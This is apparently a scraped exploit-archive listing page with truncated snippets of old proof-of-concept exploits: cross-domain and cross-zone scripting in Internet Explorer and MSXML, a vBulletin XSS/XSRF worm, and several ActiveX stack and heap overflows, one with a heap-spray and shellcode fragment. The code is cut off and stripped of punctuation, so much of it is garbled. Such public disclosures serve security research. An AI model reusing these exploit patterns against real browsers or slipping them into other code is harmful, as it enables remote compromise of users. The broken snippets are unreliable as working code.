Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

Microsoft XML Core Services DTD - Cross-Domain Scripting MS08-069 KB955218 - CVE-2008-4029 - JA var dom = new ActiveXObject"Msxml2.DOMDocument.3.0"; dom.async = false; var url = "http://www.milw0rm.com/forfun.dtd"; var xml = ""; if dom.loadXMLxml == 0 alert"Blue or Red Pill? " +...

Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069

Exploit for unknown platform in category remote exploits =================================================================== Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 =================================================================== KB955218 - CVE-2008-4029 - JA var do...

vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit

No description provided by source. / ----------------------------- Author = Mx Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm Software = vBulletin Addon = Visitor Messages Version = 3.7.3 Attack = XSS/XSRF - Description = A critical vulnerability exists in the new vBulletin 3.7.3 softwa...

Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting

!-- Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability Author: Aviv Raff http://aviv.raffon.net/ Summary Internet Explorer is prone to a Cross-Zone Scripting vulnerability in its “Print Table of Links” feature. This feature allows users to add to a printed web page an...

ourgame-overflow.txt

...

Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow

milw0rm.com 2008-02-19...

MS Internet Explorer 6 (Internet.HHCtrl) Heap Overflow Vulnerability

No description provided by source. !-- http://browserfun.blogspot.com/ The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because ...

dxmsft-overflow.txt

There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199Image DirectX Transforms. This DLL exposes DirectX Image Transform objects which are safe for scripting. The issue is with the Color property of certain objects, so I am assuming this property is inherited from a base interface...

[Full-disclosure] ComponentOne FlexGrid 7.1 Light Multiple Stack Overflows

The ComponentOne FlexGrid 7.1 VSFlexGrid.VSFlexGridL has multiple stack overflows. I have not tested code execution nor do I remember what this component was installed with. PoC as follows: -------------------- !-- written by e.b. -- html head script language="JavaScript" DEFER function Check var...

flexgrid-overflow.txt

The ComponentOne FlexGrid 7.1 VSFlexGrid.VSFlexGridL has multiple stack overflows. I have not tested code execution nor do I remember what this component was installed with. PoC as follows: -------------------- function Check var s = "AAAA"; while s.length -------------------- Elazar...

[Full-disclosure] WebEx GPCContainer Memory Access Violation

There is a memory access violation in the InitParam and SetParam functions. PoC as follows: --------------------- !-- Written by e.b. -- html head script language="JavaScript" DEFER function Check var obj = new ActiveXObject"GpcContainer.GpcContainer.1"; obj.InitOaram"A"; /script /head body...

[Full-disclosure] Adobe Shockwave ShockwaveVersion() Stack Overflow

There is a stack overflow in ShockwaveVersion function. I have not been able to execute code via this overflow. PoC is as follows: ----------------------- html head script language="JavaScript" DEFER function Check var s = "AAAA"; while s.length 768 768 s=s+s; var obj = new...

Adobe Shockwave ShockwaveVersion() Stack Overflow PoC

No description provided by source. html head script language="JavaScript" DEFER function Check var s = "AAAA"; while s.length 768 768 s=s+s; var obj = new ActiveXObject"SWCtl.SWCtl"; //233C1507-6A77-46A4-9443-F871F945D258 obj.ShockwaveVersions; /script...

Adobe Shockwave ShockwaveVersion() Stack Overflow PoC

Exploit for unknown platform in category dos / poc ===================================================== Adobe Shockwave ShockwaveVersion Stack Overflow PoC ===================================================== function Check var s = "AAAA"; while s.length 0day.today 2018-01-10...

Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)

Adobe Shockwave - ShockwaveVersion Stack Overflow PoC function Check var s = "AAAA"; while s.length milw0rm.com 2007-11-08...

AskJeeves Toolbar 4.0.2.53 activex Remote Buffer Overflow Exploit

No description provided by source. html SCRIPT language="javascript" // This is new technique I invent call 'heap fill attack' var str0ke = 0x0d0d0d0d; var sucks = unescape // Launch the system calculator 100 times because what else?...

askjeeves-overflow.txt

// This is new technique I invent call 'heap fill attack' var str0ke = 0x0d0d0d0d; var sucks = unescape // Launch the system calculator 100 times because what else? // This code currently not work on Solaris/Sparc "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +...

[Full-disclosure] MS07-042 XMLDOM substringData() PoC

This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2 var xmlDoc = new ActiveXObject"Microsoft.XMLDOM"; xmlDoc.loadXML"dummy/dummy"; var txt = xmlDoc.createTextNode"huh"; var out = txt.substringData1,0x7fffffff; Installing the patch from MS07-042 fixes it. Cheers, Alla Bezroutchko...

MOAB-03-01-2007.rb.txt

!/usr/bin/ruby c 2006 LMH Original scripting and POC by Aviv Raff http://aviv.raffon.net. Description: Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the fake FTP server required. HTTP server port can be modified but it's not recommended. Adjust as...

MS Internet Explorer (ADODB Execute) Denial of Service PoC

No description provided by source. !-- // Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC // tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed // Author: YAG KOHHA skyhole at gmail.com // Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic,...